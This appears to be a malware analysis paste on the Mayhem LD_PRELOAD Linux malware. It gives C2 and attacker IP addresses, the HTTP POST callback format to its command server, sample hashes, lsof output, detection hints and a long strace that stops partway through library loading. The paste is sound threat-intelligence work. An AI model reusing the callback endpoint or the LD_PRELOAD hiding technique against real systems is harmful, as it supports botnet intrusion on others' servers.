Mayhem installer Aug 5th 2014

MalwareMustDie Aug 5th, 2014 597 Never
  1. # MalwareMUSTDie! Mayhem (.so ELF malware abusing LD_PRELOAD) installer
  2. # Case spotted & captured by @yinX, analyzed : @unixfreaxjp
  3. # CNC: 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
  4. # Attacker source IPs (looked up with the author's origin.sh helper):
  5. $ echo 46.149.111.171   |bash origin.sh
  6. 46.149.111.171||61214 | 46.149.111.0/24 | VDSINSIDE | UA | VDSINSIDE.COM | ELERIUM LTD
  7. $
  8. $ echo 188.165.217.216   |bash origin.sh
  9. 188.165.217.216|ns312431.ip-188-165-217.eu.|16276 | 188.165.0.0/16 | OVH | FR | OVH.COM | OVH SAS
  10. $
  11. $ echo 176.119.3.242   |bash origin.sh
  12. 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
  13.  
  14. # callback format:
  15.    POST /cupids_banner/cupids.php HTTP/1.0
  16.    Host: lovecupidonline.info
  17.    Pragma: 1337
  18.  
  19. # Detection ratio on VirusTotal (note: these are NOT Windows binaries, so the low ratios below are the actual figures for ELF/PHP coverage; hashes are SHA256)
  20.  
  21. PHP installer: (6/54) 03c80f6d678857431645e079eeacb21cbe4e37f1a4643814dd7ad67a926d8c2a
  22. ELF bruteforce.so: (2/54) 3ec6f7201d8578b2befb55652a2c9df25ed0e62ffd8e38f8d9bea23bebfdcf3c
  23. ELF cmsurls.so: (2/54) 3d07e0fb23d0e498b25bca7f4dd696cf507763242725e98b92178332a112bc36
  24. ELF atom-aggregator-32.so: (16/54) 8983f3a07236bcf24f8db4c4c0cec1ad0042806cbf431500867da01c2f4619d4
  25. ELF atom-aggregator-64.so: (14/54) 77d77eed0cad458fd1f3278d5bb93b8e7073d87f855c9e811cec66abad428b53
  26.  
  27. // dropped malware data store (the 12 MB hidden `.cache` file the .so maps into the host process; appears to be encrypted):
  28.  
  29. -rw-r--r-- 1 12582912 Aug  5 10:25 .cache 74fb94dcf856dbe4e848dbcedb51c419
  30. # decryption of .cache not yet successful...
  31.  
  32. // samples:
  33.  
  34. MD5 (atom-aggregator-32.so) = 61092c67dd76505ed23434fdad14f26a (this binary analysis)
  35. MD5 (atom-aggregator-64.so) = af680d137d3fb407ef654a98e2ac7643 (this binary analysis)
  36. MD5 (bruteforce.so) = ab69765fadcec09e44cc0df06653982e ==> bruters, self explanatory
  37. MD5 (cmsurls.so) = 720bc891a7468ef5c29eb4da211c142b ==> callbacks: https://gist.github.com/Yinette/082d616453ca574c6a7b
  38.  
  39. // executed, PoC (note: lsof reports the .so as DEL — the file was unlinked after being mapped into /usr/bin/host, so when hunting check /proc/<pid>/maps for "(deleted)" mappings and for .cache mapped into unexpected processes):
  40.  
  41. mmd@1x111 ~/0x02E/009 $ date
  42. Tue Aug  5 10:27:46 CEST 2014
  43.  
  44. $ lsof |grep atom
  45. host      18153              mmd  DEL       REG      9,2          30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
  46.  
  47. $ lsof -p 18153
  48. COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF     NODE NAME
  49. host    18153  mmd  cwd    DIR    9,2     4096 30148960 /home/mmd/0x02E/009
  50. host    18153  mmd  rtd    DIR    9,2     4096        2 /
  51. host    18153  mmd  txt    REG    9,2   117128 12453326 /usr/bin/host
  52. host    18153  mmd  mem    REG    9,2    22928 38797877 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
  53. host    18153  mmd  mem    REG    9,2    47616 38797878 /lib/x86_64-linux-gnu/libnss_files-2.13.so
  54. host    18153  mmd  mem    REG    9,2 12582912 30149146 /home/mmd/0x02E/009/.cache
  55. host    18153  mmd  mem    REG    9,2    93208 12455541 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
  56. host    18153  mmd  mem    REG    9,2   530736 38797873 /lib/x86_64-linux-gnu/libm-2.13.so
  57. host    18153  mmd  mem    REG    9,2   141784 38797700 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
  58. host    18153  mmd  mem    REG    9,2    18672 38797775 /lib/x86_64-linux-gnu/libattr.so.1.1.0
  59. host    18153  mmd  mem    REG    9,2    34840 12456099 /usr/lib/libisccc.so.80.0.2
  60. host    18153  mmd  mem    REG    9,2    92752 38797727 /lib/x86_64-linux-gnu/libz.so.1.2.7
  61. host    18153  mmd  mem    REG    9,2    80712 38797886 /lib/x86_64-linux-gnu/libresolv-2.13.so
  62. host    18153  mmd  mem    REG    9,2    14320 38797702 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
  63. host    18153  mmd  mem    REG    9,2    35400 12455796 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
  64. host    18153  mmd  mem    REG    9,2    14672 38797691 /lib/x86_64-linux-gnu/libcom_err.so.2.1
  65. host    18153  mmd  mem    REG    9,2   162632 12455436 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
  66. host    18153  mmd  mem    REG    9,2   868096 12455510 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
  67. host    18153  mmd  mem    REG    9,2   219192 12451949 /usr/lib/libGeoIP.so.1.4.8
  68. host    18153  mmd  mem    REG    9,2  1599536 38797824 /lib/x86_64-linux-gnu/libc-2.13.so
  69. host    18153  mmd  mem    REG    9,2  1436984 12455509 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
  70. host    18153  mmd  mem    REG    9,2   131107 38797884 /lib/x86_64-linux-gnu/libpthread-2.13.so
  71. host    18153  mmd  mem    REG    9,2    17112 38797717 /lib/x86_64-linux-gnu/libcap.so.2.22
  72. host    18153  mmd  mem    REG    9,2    14768 38797839 /lib/x86_64-linux-gnu/libdl-2.13.so
  73. host    18153  mmd  mem    REG    9,2   368072 12453396 /usr/lib/libisc.so.84.1.0
  74. host    18153  mmd  mem    REG    9,2   139616 12452611 /usr/lib/libisccfg.so.82.0.3
  75. host    18153  mmd  mem    REG    9,2    51048 12452613 /usr/lib/libbind9.so.80.0.7
  76. host    18153  mmd  mem    REG    9,2  2048480 12455516 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  77. host    18153  mmd  mem    REG    9,2   257288 12455485 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
  78. host    18153  mmd  mem    REG    9,2  1674552 12452609 /usr/lib/libdns.so.88.1.1
  79. host    18153  mmd  mem    REG    9,2    75752 12455394 /usr/lib/liblwres.so.80.0.3
  80. host    18153  mmd  DEL    REG    9,2          30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
  81. host    18153  mmd  mem    REG    9,2   136936 38797728 /lib/x86_64-linux-gnu/ld-2.13.so
  82. host    18153  mmd    0r   CHR    1,3      0t0     1027 /dev/null
  83. host    18153  mmd    1r   CHR    1,3      0t0     1027 /dev/null
  84. host    18153  mmd    2r   CHR    1,3      0t0     1027 /dev/null
  85. host    18153  mmd    3r   CHR    1,3      0t0     1027 /dev/null
  86.  
  87. // patched for debugging; strace of the run follows (the .so is opened right after execve and before /etc/ld.so.preload, i.e. via LD_PRELOAD; near the end it writes a 106-byte 32-bit ELF stub to ./1.<pid> with mode 0777, forks, execs it and reads exit code 99 — likely a probe for 32-bit execution capability):
  88.  
  89. execve("/usr/bin/host", ["/usr/bin/host"], [/* 20 vars */]) = 0
  90. brk(0)                                  = 0x7f57dd0d4000
  91. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  92. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0bf000
  93. open("./atom-aggregator-64.so", O_RDONLY) = 3
  94. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0x\23\0\0\0\0\0\0"..., 832) = 832
  95. fstat(3, {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
  96. getcwd("/home/mmd/0x02E/009", 128)      = 20
  97. mmap(NULL, 2151928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57dac94000
  98. mprotect(0x7f57dac9b000, 2093056, PROT_NONE) = 0
  99. mmap(0x7f57dae9a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f57dae9a000
  100. mmap(0x7f57dae9b000, 26104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57dae9b000
  101. mprotect(0x7fff5d64a000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
  102. close(3)                                = 0
  103. access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
  104. open("/etc/ld.so.cache", O_RDONLY)      = 3
  105. fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  106. mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f57db0b1000
  107. close(3)                                = 0
  108. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  109. open("/usr/lib/liblwres.so.80", O_RDONLY) = 3
  110. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P6\0\0\0\0\0\0"..., 832) = 832
  111. fstat(3, {st_mode=S_IFREG|0644, st_size=75752, ...}) = 0
  112. mmap(NULL, 2171040, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57daa81000
  113. mprotect(0x7f57daa93000, 2093056, PROT_NONE) = 0
  114. mmap(0x7f57dac92000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x11000) = 0x7f57dac92000
  115. close(3)                                = 0
  116. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  117. open("/usr/lib/libdns.so.88", O_RDONLY) = 3
  118. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\244\2\0\0\0\0\0"..., 832) = 832
  119. fstat(3, {st_mode=S_IFREG|0644, st_size=1674552, ...}) = 0
  120. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0b0000
  121. mmap(NULL, 3773136, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da6e7000
  122. mprotect(0x7f57da879000, 2093056, PROT_NONE) = 0
  123. mmap(0x7f57daa78000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x191000) = 0x7f57daa78000
  124. mmap(0x7f57daa80000, 720, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57daa80000
  125. close(3)                                = 0
  126. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  127. open("/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2", O_RDONLY) = 3
  128. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\266\0\0\0\0\0\0"..., 832) = 832
  129. fstat(3, {st_mode=S_IFREG|0644, st_size=257288, ...}) = 0
  130. mmap(NULL, 2353120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da4a8000
  131. mprotect(0x7f57da4e4000, 2097152, PROT_NONE) = 0
  132. mmap(0x7f57da6e4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3c000) = 0x7f57da6e4000
  133. close(3)                                = 0
  134. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  135. open("/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0", O_RDONLY) = 3
  136. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\207\7\0\0\0\0\0"..., 832) = 832
  137. fstat(3, {st_mode=S_IFREG|0644, st_size=2048480, ...}) = 0
  138. mmap(NULL, 4158808, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da0b0000
  139. mprotect(0x7f57da27a000, 2097152, PROT_NONE) = 0
  140. mmap(0x7f57da47a000, 172032, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7f57da47a000
  141. mmap(0x7f57da4a4000, 13656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57da4a4000
  142. close(3)                                = 0
  143. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  144. open("/usr/lib/libbind9.so.80", O_RDONLY) = 3
  145. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340-\0\0\0\0\0\0"..., 832) = 832
  146. fstat(3, {st_mode=S_IFREG|0644, st_size=51048, ...}) = 0
  147. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0af000
  148. mmap(NULL, 2146352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9ea3000
  149. mprotect(0x7f57d9eaf000, 2093056, PROT_NONE) = 0
  150. mmap(0x7f57da0ae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xb000) = 0x7f57da0ae000
  151. close(3)                                = 0
  152. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  153. open("/usr/lib/libisccfg.so.82", O_RDONLY) = 3
  154. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\355\0\0\0\0\0\0"..., 832) = 832
  155. fstat(3, {st_mode=S_IFREG|0644, st_size=139616, ...}) = 0
  156. mmap(NULL, 2238208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9c80000
  157. mprotect(0x7f57d9c9b000, 2097152, PROT_NONE) = 0
  158. mmap(0x7f57d9e9b000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b000) = 0x7f57d9e9b000
  159. mmap(0x7f57d9ea2000, 1792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9ea2000
  160. close(3)                                = 0
  161. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  162. open("/usr/lib/libisc.so.84", O_RDONLY) = 3
  163. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360\374\0\0\0\0\0\0"..., 832) = 832
  164. fstat(3, {st_mode=S_IFREG|0644, st_size=368072, ...}) = 0
  165. mmap(NULL, 2464112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9a26000
  166. mprotect(0x7f57d9a7e000, 2093056, PROT_NONE) = 0
  167. mmap(0x7f57d9c7d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x57000) = 0x7f57d9c7d000
  168. close(3)                                = 0
  169. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  170. open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3
  171. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\r\0\0\0\0\0\0"..., 832) = 832
  172. fstat(3, {st_mode=S_IFREG|0644, st_size=14768, ...}) = 0
  173. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ae000
  174. mmap(NULL, 2109696, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9822000
  175. mprotect(0x7f57d9824000, 2097152, PROT_NONE) = 0
  176. mmap(0x7f57d9a24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d9a24000
  177. close(3)                                = 0
  178. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  179. open("/lib/x86_64-linux-gnu/libcap.so.2", O_RDONLY) = 3
  180. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\26\0\0\0\0\0\0"..., 832) = 832
  181. fstat(3, {st_mode=S_IFREG|0644, st_size=17112, ...}) = 0
  182. mmap(NULL, 2112384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d961e000
  183. mprotect(0x7f57d9622000, 2093056, PROT_NONE) = 0
  184. mmap(0x7f57d9821000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d9821000
  185. close(3)                                = 0
  186. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  187. open("/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY) = 3
  188. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@\\\0\0\0\0\0\0"..., 832) = 832
  189. fstat(3, {st_mode=S_IFREG|0755, st_size=131107, ...}) = 0
  190. mmap(NULL, 2208672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9402000
  191. mprotect(0x7f57d9419000, 2093056, PROT_NONE) = 0
  192. mmap(0x7f57d9618000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7f57d9618000
  193. mmap(0x7f57d961a000, 13216, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d961a000
  194. close(3)                                = 0
  195. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  196. open("/usr/lib/x86_64-linux-gnu/libxml2.so.2", O_RDONLY) = 3
  197. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`\377\2\0\0\0\0\0"..., 832) = 832
  198. fstat(3, {st_mode=S_IFREG|0644, st_size=1436984, ...}) = 0
  199. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ad000
  200. mmap(NULL, 3537400, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d90a2000
  201. mprotect(0x7f57d91f7000, 2097152, PROT_NONE) = 0
  202. mmap(0x7f57d93f7000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x155000) = 0x7f57d93f7000
  203. mmap(0x7f57d9401000, 2552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9401000
  204. close(3)                                = 0
  205. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  206. open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
  207. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  208. fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  209. mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8d17000
  210. mprotect(0x7f57d8e99000, 2093056, PROT_NONE) = 0
  211. mmap(0x7f57d9098000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f57d9098000
  212. mmap(0x7f57d909d000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d909d000
  213. close(3)                                = 0
  214. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  215. open("/usr/lib/libGeoIP.so.1", O_RDONLY) = 3
  216. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0c\0\0\0\0\0\0"..., 832) = 832
  217. fstat(3, {st_mode=S_IFREG|0644, st_size=219192, ...}) = 0
  218. mmap(NULL, 2314592, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8ae1000
  219. mprotect(0x7f57d8b15000, 2093056, PROT_NONE) = 0
  220. mmap(0x7f57d8d14000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x33000) = 0x7f57d8d14000
  221. close(3)                                = 0
  222. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  223. open("/usr/lib/x86_64-linux-gnu/libkrb5.so.3", O_RDONLY) = 3
  224. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\310\1\0\0\0\0\0"..., 832) = 832
  225. fstat(3, {st_mode=S_IFREG|0644, st_size=868096, ...}) = 0
  226. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ac000
  227. mmap(NULL, 2963968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d880d000
  228. mprotect(0x7f57d88d6000, 2093056, PROT_NONE) = 0
  229. mmap(0x7f57d8ad5000, 49152, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xc8000) = 0x7f57d8ad5000
  230. close(3)                                = 0
  231. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  232. open("/usr/lib/x86_64-linux-gnu/libk5crypto.so.3", O_RDONLY) = 3
  233. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360H\0\0\0\0\0\0"..., 832) = 832
  234. fstat(3, {st_mode=S_IFREG|0644, st_size=162632, ...}) = 0
  235. mmap(NULL, 2261424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d85e4000
  236. mprotect(0x7f57d860a000, 2097152, PROT_NONE) = 0
  237. mmap(0x7f57d880a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f57d880a000
  238. mmap(0x7f57d880c000, 432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d880c000
  239. close(3)                                = 0
  240. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  241. open("/lib/x86_64-linux-gnu/libcom_err.so.2", O_RDONLY) = 3
  242. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\26\0\0\0\0\0\0"..., 832) = 832
  243. fstat(3, {st_mode=S_IFREG|0644, st_size=14672, ...}) = 0
  244. mmap(NULL, 2109928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d83e0000
  245. mprotect(0x7f57d83e3000, 2093056, PROT_NONE) = 0
  246. mmap(0x7f57d85e2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d85e2000
  247. close(3)                                = 0
  248. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  249. open("/usr/lib/x86_64-linux-gnu/libkrb5support.so.0", O_RDONLY) = 3
  250. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240%\0\0\0\0\0\0"..., 832) = 832
  251. fstat(3, {st_mode=S_IFREG|0644, st_size=35400, ...}) = 0
  252. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ab000
  253. mmap(NULL, 2130800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d81d7000
  254. mprotect(0x7f57d81df000, 2093056, PROT_NONE) = 0
  255. mmap(0x7f57d83de000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d83de000
  256. close(3)                                = 0
  257. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  258. open("/lib/x86_64-linux-gnu/libkeyutils.so.1", O_RDONLY) = 3
  259. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\22\0\0\0\0\0\0"..., 832) = 832
  260. fstat(3, {st_mode=S_IFREG|0644, st_size=14320, ...}) = 0
  261. mmap(NULL, 2109456, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7fd3000
  262. mprotect(0x7f57d7fd6000, 2093056, PROT_NONE) = 0
  263. mmap(0x7f57d81d5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d81d5000
  264. close(3)                                = 0
  265. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  266. open("/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY) = 3
  267. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3008\0\0\0\0\0\0"..., 832) = 832
  268. fstat(3, {st_mode=S_IFREG|0644, st_size=80712, ...}) = 0
  269. mmap(NULL, 2185864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7dbd000
  270. mprotect(0x7f57d7dd0000, 2093056, PROT_NONE) = 0
  271. mmap(0x7f57d7fcf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7f57d7fcf000
  272. mmap(0x7f57d7fd1000, 6792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d7fd1000
  273. close(3)                                = 0
  274. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  275. open("/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY) = 3
  276. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340#\0\0\0\0\0\0"..., 832) = 832
  277. fstat(3, {st_mode=S_IFREG|0644, st_size=92752, ...}) = 0
  278. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0aa000
  279. mmap(NULL, 2187792, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7ba6000
  280. mprotect(0x7f57d7bbc000, 2093056, PROT_NONE) = 0
  281. mmap(0x7f57d7dbb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7f57d7dbb000
  282. close(3)                                = 0
  283. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  284. open("/usr/lib/libisccc.so.80", O_RDONLY) = 3
  285. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320'\0\0\0\0\0\0"..., 832) = 832
  286. fstat(3, {st_mode=S_IFREG|0644, st_size=34840, ...}) = 0
  287. mmap(NULL, 2130208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d799d000
  288. mprotect(0x7f57d79a5000, 2093056, PROT_NONE) = 0
  289. mmap(0x7f57d7ba4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d7ba4000
  290. close(3)                                = 0
  291. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  292. open("/lib/x86_64-linux-gnu/libattr.so.1", O_RDONLY) = 3
  293. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\25\0\0\0\0\0\0"..., 832) = 832
  294. fstat(3, {st_mode=S_IFREG|0644, st_size=18672, ...}) = 0
  295. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a9000
  296. mmap(NULL, 2113880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7798000
  297. mprotect(0x7f57d779c000, 2093056, PROT_NONE) = 0
